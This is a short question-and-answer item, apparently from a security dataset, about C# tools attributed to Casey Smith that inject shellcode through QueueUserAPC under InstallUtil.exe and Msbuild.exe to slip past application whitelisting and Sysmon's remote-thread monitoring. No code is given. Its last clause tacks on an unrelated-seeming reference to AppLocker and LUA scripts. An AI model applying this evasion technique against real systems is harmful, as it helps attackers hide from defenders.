What tools did Casey Smith share to execute APC injection and avoid Sysmon?

Casey Smith shared C# implementations that leverage `QueueUserAPC` for shellcode injection, designed to run under `InstallUtil.exe` and `Msbuild.exe`. These utilities are trusted by Windows and often allowed through application whitelisting solutions. The code, available on GitHub, executes the injection without creating a remote thread, thus bypassing Sysmon's CreateRemoteThread monitoring, similar to Testing and Analysis of Bypassing AppLocker Using LUA Scripts.